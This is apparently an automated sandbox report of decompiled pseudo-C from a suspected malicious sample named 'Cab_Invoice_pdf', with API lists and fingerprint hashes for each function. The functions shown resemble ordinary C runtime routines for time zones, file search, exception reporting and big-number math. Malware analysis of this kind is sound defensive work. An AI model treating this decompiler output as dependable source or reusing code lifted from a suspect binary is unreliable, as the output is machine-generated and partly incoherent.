                            									_v16 = 0;
                            								} else {
                            									_t70 =  *0x1346628; // 0x0
                            									if(_t70 == 0) {
                            										goto L9;
                            									} else {
                            										_v12 = 1;
                            										_v16 = (_t70 - _t89) * 0x3c;
                            									}
                            								}
                            								_t95 = E01327D59(0, _t89);
                            								if(WideCharToMultiByte(_t95, 0, 0x1346584, 0xffffffff,  *_t98, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *( *_t98) = 0;
                            								} else {
                            									( *_t98)[0x3f] = 0;
                            								}
                            								if(WideCharToMultiByte(_t95, 0, 0x13465d8, 0xffffffff, _t98[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                            									 *(_t98[1]) = 0;
                            								} else {
                            									_t98[1][0x3f] = 0;
                            								}
                            							}
                            							 *(E0132ABF6()) = _v8;
                            							 *(E0132ABEA()) = _v12;
                            							_t60 = E0132ABF0();
                            							 *_t60 = _v16;
                            							return _t60;
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,01346584,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,013465D8,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            • _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            • _free.LIBCMT ref: 0132B3B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: 629bdeb8c1ca9b598d22d1f139e53c6eaced5abf6ea478bc2e3a3ebb899d2797
                            • Instruction ID: 61c5e3984a63fa54aa86512a1a33a2db4d23e01a647ed48bdde910497867aebe
                            • Opcode Fuzzy Hash: 629bdeb8c1ca9b598d22d1f139e53c6eaced5abf6ea478bc2e3a3ebb899d2797
                            • Instruction Fuzzy Hash: 4451EAB1900329DBDB24FF6D9D4196EFBBCEF46358F10426AE514D3148EB309A40CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0131E260(void* __ebx, signed int __edx, void* __edi, void* __esi, WCHAR* _a4, signed int* _a8) {
                            				signed int _v8;
                            				void* _v12;
                            				void* _v16;
                            				struct _SYSTEMTIME _v32;
                            				struct _SYSTEMTIME _v48;
                            				char _v556;
                            				char _v580;
                            				char _v588;
                            				char _v596;
                            				struct _WIN32_FIND_DATAW _v604;
                            				signed int* _v632;
                            				void* _v636;
                            				signed int _v648;
                            				FILETIME* _v1260;
                            				signed int _v1272;
                            				signed int _t54;
                            				WCHAR* _t56;
                            				signed int _t59;
                            				signed int _t65;
                            				signed int _t66;
                            				signed int _t67;
                            				void* _t71;
                            				signed int _t73;
                            				void* _t75;
                            				signed int _t77;
                            				signed int _t78;
                            				signed int _t84;
                            				signed int _t85;
                            				signed int _t86;
                            				signed int _t92;
                            				FILETIME* _t94;
                            				signed int _t95;
                            				long _t104;
                            				long _t105;
                            				signed int _t106;
                            				signed int _t119;
                            				signed int _t122;
                            				signed int* _t125;
                            				signed int* _t127;
                            				void* _t129;
                            				void* _t130;
                            				signed int _t131;
                            				signed int _t132;
                            				void* _t134;
                            				signed int _t135;
                            				void* _t136;
                            				signed int _t137;
                            
                            				_t119 = __edx;
                            				_t54 =  *0x133c008; // 0xa3433343
                            				_v8 = _t54 ^ _t131;
                            				_t56 = _a4;
                            				_push(__esi);
                            				_t125 = _a8;
                            				if(_t125 != 0) {
                            					if(_t56 == 0) {
                            						goto L1;
                            					} else {
                            						_push(__ebx);
                            						_t122 = FindFirstFileExW(_t56, 0,  &(_v604.ftCreationTime), 0, 0, 0);
                            						if(_t122 != 0xffffffff) {
                            							asm("sbb eax, eax");
                            							 *_t125 =  ~(_v604.ftCreationTime + 0xffffff80) & _v604.ftCreationTime;
                            							_t65 =  &_v596;
                            							_push(_t65);
                            							L33();
                            							_t125[2] = _t65;
                            							_t66 =  &_v588;
                            							_push(_t66);
                            							_t125[3] = _t119;
                            							L33();
                            							_t125[4] = _t66;
                            							_t67 =  &_v580;
                            							_push(_t67);
                            							_t125[5] = _t119;
                            							L33();
                            							_t125[6] = _t67;
                            							_t125[8] = _v604.dwReserved0;
                            							_t125[7] = _t119;
                            							_t71 = E0132618C( &(_t125[9]), 0x104,  &_v556);
                            							_t135 = _t134 + 0x18;
                            							if(_t71 != 0) {
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								_push(0);
                            								E01321798();
                            								asm("int3");
                            								_push(_t131);
                            								_t132 = _t135;
                            								_t136 = _t135 - 0x254;
                            								_t73 =  *0x133c008; // 0xa3433343
                            								_v648 = _t73 ^ _t132;
                            								_t75 = _v636;
                            								_push(_t125);
                            								_t127 = _v632;
                            								if(_t75 != 0) {
                            									if(_t75 == 0xffffffff || _t127 == 0) {
                            										goto L18;
                            									} else {
                            										if(FindNextFileW(_t75,  &_v604) != 0) {
                            											asm("sbb eax, eax");
                            											 *_t127 =  ~(_v604.dwFileAttributes + 0xffffff80) & _v604.dwFileAttributes;
                            											_t84 =  &(_v604.ftCreationTime);
                            											_push(_t84);
                            											L33();
                            											_t127[2] = _t84;
                            											_t85 =  &(_v604.ftLastAccessTime);
                            											_push(_t85);
                            											_t127[3] = _t119;
                            											L33();
                            											_t127[4] = _t85;
                            											_t86 =  &(_v604.ftLastWriteTime);
                            											_push(_t86);
                            											_t127[5] = _t119;
                            											L33();
                            											_t127[6] = _t86;
                            											_t127[8] = _v604.nFileSizeLow;
                            											_t127[7] = _t119;
                            											_t78 = E0132618C( &(_t127[9]), 0x104,  &(_v604.cFileName));
                            											_t137 = _t136 + 0x18;
                            											if(_t78 == 0) {
                            												goto L20;
                            											} else {
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												_push(0);
                            												E01321798();
                            												asm("int3");
                            												_push(_t132);
                            												_t92 =  *0x133c008; // 0xa3433343
                            												_v1272 = _t92 ^ _t137;
                            												_t94 = _v1260;
                            												if(_t94->dwLowDateTime != 0 || _t94->dwHighDateTime != 0) {
                            													_t94 = FileTimeToSystemTime(_t94,  &_v48);
                            													if(_t94 == 0) {
                            														goto L35;
                            													} else {
                            														_t94 = SystemTimeToTzSpecificLocalTime(0,  &_v48,  &_v32);
                            														if(_t94 == 0) {
                            															goto L35;
                            														} else {
                            															_push(0xffffffff);
                            															_push(_v32.wSecond & 0x0000ffff);
                            															_t95 = E013256B5(0, _t119, _t127, _v32.wYear & 0x0000ffff, _v32.wMonth & 0x0000ffff, _v32.wDay & 0x0000ffff, _v32.wHour & 0x0000ffff, _v32.wMinute & 0x0000ffff);
                            														}
                            													}
                            												} else {
                            													L35:
                            													_t95 = _t94 | 0xffffffff;
                            												}
                            												E0131786A();
                            												return _t95;
                            											}
                            										} else {
                            											_t104 = GetLastError();
                            											_t129 = 2;
                            											if(_t104 < _t129) {
                            												L28:
                            												_t77 = E0131C9CE();
                            												 *_t77 = 0x16;
                            												goto L19;
                            											} else {
                            												if(_t104 <= 3) {
                            													L30:
                            													_t77 = E0131C9CE();
                            													 *_t77 = _t129;
                            													goto L19;
                            												} else {
                            													if(_t104 == 8) {
                            														_t77 = E0131C9CE();
                            														 *_t77 = 0xc;
                            														goto L19;
                            													} else {
                            														if(_t104 == 0x12) {
                            															goto L30;
                            														} else {
                            															goto L28;
                            														}
                            													}
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									L18:
                            									 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            									_t77 = E01321788();
                            									L19:
                            									_t78 = _t77 | 0xffffffff;
                            									L20:
                            									E0131786A();
                            									return _t78;
                            								}
                            							} else {
                            								_t59 = _t122;
                            								goto L10;
                            							}
                            						} else {
                            							_t105 = GetLastError();
                            							_t130 = 2;
                            							if(_t105 < _t130) {
                            								L8:
                            								_t106 = E0131C9CE();
                            								 *_t106 = 0x16;
                            							} else {
                            								if(_t105 <= 3) {
                            									L13:
                            									_t106 = E0131C9CE();
                            									 *_t106 = _t130;
                            								} else {
                            									if(_t105 == 8) {
                            										_t106 = E0131C9CE();
                            										 *_t106 = 0xc;
                            									} else {
                            										if(_t105 == 0x12) {
                            											goto L13;
                            										} else {
                            											goto L8;
                            										}
                            									}
                            								}
                            							}
                            							_t59 = _t106 | 0xffffffff;
                            							L10:
                            							goto L11;
                            						}
                            					}
                            				} else {
                            					L1:
                            					 *((intOrPtr*)(E0131C9CE())) = 0x16;
                            					_t59 = E01321788() | 0xffffffff;
                            					L11:
                            					E0131786A();
                            					return _t59;
                            				}
                            			}

                            APIs
                            • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 0131E2A9
                            • GetLastError.KERNEL32 ref: 0131E2B6
                              • Part of subcall function 0131E4A6: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,0131E328,?), ref: 0131E4D2
                              • Part of subcall function 0131E4A6: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,0131E328,?,?,?,?,0131E328,?), ref: 0131E4E6
                            • FindNextFileW.KERNEL32(?,?,?), ref: 0131E3DC
                            • GetLastError.KERNEL32 ref: 0131E3E6
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$File$ErrorFindLastSystem$FirstLocalNextSpecific
                            • String ID:
                            • API String ID: 3693236040-0
                            • Opcode ID: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction ID: f873d4738913eaf9a1c2ae63fefe330f0c6efaf0fd50cc1f0d29a19ebbd97c76
                            • Opcode Fuzzy Hash: 2c66bcd9672676ba3154a3e5d32477463e86a6f48e6baab1ffc9e53c955eb436
                            • Instruction Fuzzy Hash: 6861F7719006199FD73AAF7CCC84AAAB7E8EF45328F000A79E916D7284DB35D9448B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 84%
                            			E013215BE(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                            				char _v0;
                            				signed int _v8;
                            				intOrPtr _v524;
                            				intOrPtr _v528;
                            				void* _v532;
                            				intOrPtr _v536;
                            				char _v540;
                            				intOrPtr _v544;
                            				intOrPtr _v548;
                            				intOrPtr _v552;
                            				intOrPtr _v556;
                            				intOrPtr _v560;
                            				intOrPtr _v564;
                            				intOrPtr _v568;
                            				intOrPtr _v572;
                            				intOrPtr _v576;
                            				intOrPtr _v580;
                            				intOrPtr _v584;
                            				char _v724;
                            				intOrPtr _v792;
                            				intOrPtr _v800;
                            				char _v804;
                            				intOrPtr _v808;
                            				char _v812;
                            				void* __edi;
                            				signed int _t40;
                            				char* _t47;
                            				intOrPtr _t49;
                            				long _t57;
                            				intOrPtr _t59;
                            				intOrPtr _t60;
                            				intOrPtr _t64;
                            				intOrPtr _t65;
                            				int _t66;
                            				intOrPtr _t68;
                            				signed int _t69;
                            
                            				_t68 = __esi;
                            				_t64 = __edx;
                            				_t59 = __ebx;
                            				_t40 =  *0x133c008; // 0xa3433343
                            				_t41 = _t40 ^ _t69;
                            				_v8 = _t40 ^ _t69;
                            				_push(_t65);
                            				if(_a4 != 0xffffffff) {
                            					_push(_a4);
                            					E013182AC(_t41);
                            					_pop(_t60);
                            				}
                            				E01318520(_t65,  &_v804, 0, 0x50);
                            				E01318520(_t65,  &_v724, 0, 0x2cc);
                            				_v812 =  &_v804;
                            				_t47 =  &_v724;
                            				_v808 = _t47;
                            				_v548 = _t47;
                            				_v552 = _t60;
                            				_v556 = _t64;
                            				_v560 = _t59;
                            				_v564 = _t68;
                            				_v568 = _t65;
                            				_v524 = ss;
                            				_v536 = cs;
                            				_v572 = ds;
                            				_v576 = es;
                            				_v580 = fs;
                            				_v584 = gs;
                            				asm("pushfd");
                            				_pop( *_t22);
                            				_v540 = _v0;
                            				_t25 =  &_v0; // 0x1b
                            				_t49 = _t25;
                            				_v528 = _t49;
                            				_v724 = 0x10001;
                            				_v544 =  *((intOrPtr*)(_t49 - 4));
                            				_v804 = _a8;
                            				_v800 = _a12;
                            				_v792 = _v0;
                            				_t66 = IsDebuggerPresent();
                            				SetUnhandledExceptionFilter(0);
                            				_t36 =  &_v812; // -785
                            				_t57 = UnhandledExceptionFilter(_t36);
                            				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                            					_push(_a4);
                            					_t57 = E013182AC(_t57);
                            				}
                            				E0131786A();
                            				return _t57;
                            			}

                            APIs
                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 013216B6
                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 013216C0
                            • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 013216CD
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                            • String ID:
                            • API String ID: 3906539128-0
                            • Opcode ID: 884016d0e8547b3095cc728c1368bc0a2a2560fb24b51bc6128011fe38af4ed9
                            • Instruction ID: 18383a33312d676970b3c353f1531b53c455d62876f7251cf4cbeb978e113bf8
                            • Opcode Fuzzy Hash: 884016d0e8547b3095cc728c1368bc0a2a2560fb24b51bc6128011fe38af4ed9
                            • Instruction Fuzzy Hash: 2531C67590122D9BCB25DF68D988BCDBBB8FF18314F5042DAE81CA7250E7709B858F45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E01320158(int _a4) {
                            				void* _t14;
                            
                            				if(E01323A8A(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                            					TerminateProcess(GetCurrentProcess(), _a4);
                            				}
                            				E013201DD(_t14, _a4);
                            				ExitProcess(_a4);
                            			}

                            APIs
                            • GetCurrentProcess.KERNEL32(?,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320179
                            • TerminateProcess.KERNEL32(00000000,?,0132012E,?,0133A6E0,0000000C,01320285,?,00000002,00000000), ref: 01320180
                            • ExitProcess.KERNEL32 ref: 01320192
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: c5027ed000ffbcc3f786a3aec6cc6476c239671b7c3fb9759d7fc9a5cf38d072
                            • Instruction ID: 06896e1702366cf5f53ceec0d91dfc956be6d9ca58e51b5cafefabc1b97dcd90
                            • Opcode Fuzzy Hash: c5027ed000ffbcc3f786a3aec6cc6476c239671b7c3fb9759d7fc9a5cf38d072
                            • Instruction Fuzzy Hash: 9FE0EC35400158AFDF2A7F58E948A597F7DFF54785F140414F9059A121CB39E946CB84
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E0132715E(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                            				intOrPtr _v8;
                            				signed int _v12;
                            				intOrPtr _v28;
                            				signed int _v32;
                            				WCHAR* _v36;
                            				signed int _v48;
                            				intOrPtr _v556;
                            				intOrPtr _v558;
                            				struct _WIN32_FIND_DATAW _v604;
                            				intOrPtr* _v608;
                            				signed int _v612;
                            				signed int _v616;
                            				intOrPtr _v644;
                            				intOrPtr _v648;
                            				void* __edi;
                            				signed int _t40;
                            				signed int _t45;
                            				signed int _t48;
                            				signed int _t50;
                            				signed int _t51;
                            				signed char _t53;
                            				signed int _t62;
                            				void* _t64;
                            				union _FINDEX_INFO_LEVELS _t66;
                            				union _FINDEX_INFO_LEVELS _t67;
                            				signed int _t70;
                            				intOrPtr* _t71;
                            				signed int _t74;
                            				void* _t80;
                            				void* _t82;
                            				signed int _t83;
                            				void* _t87;
                            				WCHAR* _t88;
                            				intOrPtr* _t92;
                            				intOrPtr _t95;
                            				void* _t97;
                            				signed int _t98;
                            				intOrPtr* _t102;
                            				signed int _t105;
                            				void* _t108;
                            				intOrPtr _t109;
                            				void* _t110;
                            				void* _t112;
                            				void* _t113;
                            				signed int _t115;
                            				void* _t116;
                            				union _FINDEX_INFO_LEVELS _t117;
                            				void* _t121;
                            				void* _t122;
                            				void* _t123;
                            				signed int _t124;
                            				void* _t125;
                            				signed int _t130;
                            				void* _t131;
                            				signed int _t132;
                            				void* _t133;
                            				void* _t134;
                            
                            				_push(__ecx);
                            				_t92 = _a4;
                            				_t2 = _t92 + 2; // 0x2
                            				_t108 = _t2;
                            				do {
                            					_t40 =  *_t92;
                            					_t92 = _t92 + 2;
                            				} while (_t40 != 0);
                            				_t115 = _a12;
                            				_t95 = (_t92 - _t108 >> 1) + 1;
                            				_v8 = _t95;
                            				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
                            					_t5 = _t115 + 1; // 0x1
                            					_t87 = _t5 + _t95;
                            					_t122 = E01320B10(_t95, _t87, 2);
                            					_t97 = _t121;
                            					__eflags = _t115;
                            					if(_t115 == 0) {
                            						L6:
                            						_push(_v8);
                            						_t87 = _t87 - _t115;
                            						_t45 = E01326F6E(_t97, _t122 + _t115 * 2, _t87, _a4);
                            						_t132 = _t131 + 0x10;
                            						__eflags = _t45;
                            						if(__eflags != 0) {
                            							goto L9;
                            						} else {
                            							_t80 = E013273D7(_a16, __eflags, _t122);
                            							E013209EB(0);
                            							_t82 = _t80;
                            							goto L8;
                            						}
                            					} else {
                            						_push(_t115);
                            						_t83 = E01326F6E(_t97, _t122, _t87, _a8);
                            						_t132 = _t131 + 0x10;
                            						__eflags = _t83;
                            						if(_t83 != 0) {
                            							L9:
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							_push(0);
                            							E01321798();
                            							asm("int3");
                            							_t130 = _t132;
                            							_t133 = _t132 - 0x260;
                            							_t48 =  *0x133c008; // 0xa3433343
                            							_v48 = _t48 ^ _t130;
                            							_t109 = _v28;
                            							_t98 = _v32;
                            							_push(_t87);
                            							_t88 = _v36;
                            							_push(_t122);
                            							_push(_t115);
                            							_t123 = 0x5c;
                            							_v644 = _t109;
                            							_v648 = 0x2f;
                            							_t116 = 0x3a;
                            							while(1) {
                            								__eflags = _t98 - _t88;
                            								if(_t98 == _t88) {
                            									break;
                            								}
                            								_t50 =  *_t98 & 0x0000ffff;
                            								__eflags = _t50 - _v612;
                            								if(_t50 != _v612) {
                            									__eflags = _t50 - _t123;
                            									if(_t50 != _t123) {
                            										__eflags = _t50 - _t116;
                            										if(_t50 != _t116) {
                            											_t98 = _t98 - 2;
                            											__eflags = _t98;
                            											continue;
                            										}
                            									}
                            								}
                            								break;
                            							}
                            							_t124 =  *_t98 & 0x0000ffff;
                            							__eflags = _t124 - _t116;
                            							if(_t124 != _t116) {
                            								L19:
                            								_t51 = _t124;
                            								_t117 = 0;
                            								_t110 = 0x2f;
                            								__eflags = _t51 - _t110;
                            								if(_t51 == _t110) {
                            									L23:
                            									_t53 = 1;
                            									__eflags = 1;
                            								} else {
                            									_t112 = 0x5c;
                            									__eflags = _t51 - _t112;
                            									if(_t51 == _t112) {
                            										goto L23;
                            									} else {
                            										_t113 = 0x3a;
                            										__eflags = _t51 - _t113;
                            										if(_t51 == _t113) {
                            											goto L23;
                            										} else {
                            											_t53 = 0;
                            										}
                            									}
                            								}
                            								_t101 = (_t98 - _t88 >> 1) + 1;
                            								asm("sbb eax, eax");
                            								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
                            								E01318520(_t117,  &_v604, _t117, 0x250);
                            								_t134 = _t133 + 0xc;
                            								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
                            								__eflags = _t125 - 0xffffffff;
                            								if(_t125 != 0xffffffff) {
                            									_t102 = _v608;
                            									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
                            									__eflags = _t62;
                            									_v616 = _t62 >> 2;
                            									_t64 = 0x2e;
                            									do {
                            										__eflags = _v604.cFileName - _t64;
                            										if(_v604.cFileName != _t64) {
                            											L36:
                            											_push(_t102);
                            											_t66 = E0132715E(_t102,  &(_v604.cFileName), _t88, _v612);
                            											_t134 = _t134 + 0x10;
                            											__eflags = _t66;
                            											if(_t66 != 0) {
                            												goto L26;
                            											} else {
                            												goto L37;
                            											}
                            										} else {
                            											__eflags = _v558 - _t117;
                            											if(_v558 == _t117) {
                            												goto L37;
                            											} else {
                            												__eflags = _v558 - _t64;
                            												if(_v558 != _t64) {
                            													goto L36;
                            												} else {
                            													__eflags = _v556 - _t117;
                            													if(_v556 == _t117) {
                            														goto L37;
                            													} else {
                            														goto L36;
                            													}
                            												}
                            											}
                            										}
                            										goto L40;
                            										L37:
                            										_t70 = FindNextFileW(_t125,  &_v604);
                            										_t102 = _v608;
                            										__eflags = _t70;
                            										_t64 = 0x2e;
                            									} while (_t70 != 0);
                            									_t71 = _t102;
                            									_t105 = _v616;
                            									_t111 =  *_t71;
                            									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
                            									__eflags = _t105 - _t74;
                            									if(_t105 != _t74) {
                            										E0132C480(_t111 + _t105 * 4, _t74 - _t105, 4, E01326F79);
                            									}
                            								} else {
                            									_push(_v608);
                            									_t66 = E0132715E(_t101, _t88, _t117, _t117);
                            									L26:
                            									_t117 = _t66;
                            								}
                            								__eflags = _t125 - 0xffffffff;
                            								if(_t125 != 0xffffffff) {
                            									FindClose(_t125);
                            								}
                            								_t67 = _t117;
                            							} else {
                            								__eflags = _t98 -  &(_t88[1]);
                            								if(_t98 ==  &(_t88[1])) {
                            									goto L19;
                            								} else {
                            									_push(_t109);
                            									_t67 = E0132715E(_t98, _t88, 0, 0);
                            								}
                            							}
                            							__eflags = _v12 ^ _t130;
                            							E0131786A();
                            							return _t67;
                            						} else {
                            							goto L6;
                            						}
                            					}
                            				} else {
                            					_t82 = 0xc;
                            					L8:
                            					return _t82;
                            				}
                            				L40:
                            			}

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: /
                            • API String ID: 0-2043925204
                            • Opcode ID: 0ad44a2370c7647974f3fb11fdf8560f88c7b97a4c2d8332a685ebc93ea62d29
                            • Instruction ID: 6e79c7d5cca0e6d2844d558d55c50ccf9a167e4ef4d748e114f6fa4219d51d26
                            • Opcode Fuzzy Hash: 0ad44a2370c7647974f3fb11fdf8560f88c7b97a4c2d8332a685ebc93ea62d29
                            • Instruction Fuzzy Hash: 6B412872900229ABCB24AFBDCC88DAB77BDFB85718F204268F905D7180E630DD458B54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E013292A0(signed int* _a4, signed int* _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				signed int _v52;
                            				signed int _v56;
                            				signed int _v60;
                            				signed int _v64;
                            				signed int _v68;
                            				signed int _v72;
                            				signed int _v76;
                            				signed int* _v80;
                            				char _v540;
                            				signed int _v544;
                            				signed int _t197;
                            				signed int _t198;
                            				signed int* _t200;
                            				signed int _t201;
                            				signed int _t204;
                            				signed int _t206;
                            				signed int _t208;
                            				signed int _t209;
                            				signed int _t213;
                            				signed int _t219;
                            				intOrPtr _t225;
                            				void* _t228;
                            				signed int _t230;
                            				signed int _t247;
                            				signed int _t250;
                            				void* _t253;
                            				signed int _t256;
                            				signed int* _t262;
                            				signed int _t263;
                            				signed int _t264;
                            				void* _t265;
                            				intOrPtr* _t266;
                            				signed int _t267;
                            				signed int _t269;
                            				signed int _t270;
                            				signed int _t271;
                            				signed int _t272;
                            				signed int* _t274;
                            				signed int* _t278;
                            				signed int _t279;
                            				signed int _t280;
                            				intOrPtr _t282;
                            				void* _t286;
                            				signed char _t292;
                            				signed int _t295;
                            				signed int _t303;
                            				signed int _t306;
                            				signed int _t307;
                            				signed int _t309;
                            				signed int _t311;
                            				signed int _t313;
                            				intOrPtr* _t314;
                            				signed int _t318;
                            				signed int _t322;
                            				signed int* _t328;
                            				signed int _t330;
                            				signed int _t331;
                            				signed int _t333;
                            				void* _t334;
                            				signed int _t336;
                            				signed int _t338;
                            				signed int _t341;
                            				signed int _t342;
                            				signed int* _t344;
                            				signed int _t349;
                            				signed int _t351;
                            				void* _t355;
                            				signed int _t359;
                            				signed int _t360;
                            				signed int _t362;
                            				signed int* _t368;
                            				signed int* _t369;
                            				signed int* _t370;
                            				signed int* _t373;
                            
                            				_t262 = _a4;
                            				_t197 =  *_t262;
                            				if(_t197 != 0) {
                            					_t328 = _a8;
                            					_t267 =  *_t328;
                            					__eflags = _t267;
                            					if(_t267 != 0) {
                            						_t3 = _t197 - 1; // -1
                            						_t349 = _t3;
                            						_t4 = _t267 - 1; // -1
                            						_t198 = _t4;
                            						_v16 = _t349;
                            						__eflags = _t198;
                            						if(_t198 != 0) {
                            							__eflags = _t198 - _t349;
                            							if(_t198 > _t349) {
                            								L23:
                            								__eflags = 0;
                            								return 0;
                            							} else {
                            								_t46 = _t198 + 1; // 0x0
                            								_t306 = _t349 - _t198;
                            								_v60 = _t46;
                            								_t269 = _t349;
                            								__eflags = _t349 - _t306;
                            								if(_t349 < _t306) {
                            									L21:
                            									_t306 = _t306 + 1;
                            									__eflags = _t306;
                            								} else {
                            									_t368 =  &(_t262[_t349 + 1]);
                            									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
                            									__eflags = _t341;
                            									while(1) {
                            										__eflags =  *_t341 -  *_t368;
                            										if( *_t341 !=  *_t368) {
                            											break;
                            										}
                            										_t269 = _t269 - 1;
                            										_t341 = _t341 - 4;
                            										_t368 = _t368 - 4;
                            										__eflags = _t269 - _t306;
                            										if(_t269 >= _t306) {
                            											continue;
                            										} else {
                            											goto L21;
                            										}
                            										goto L22;
                            									}
                            									_t369 = _a8;
                            									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
                            									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
                            									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
                            										goto L21;
                            									}
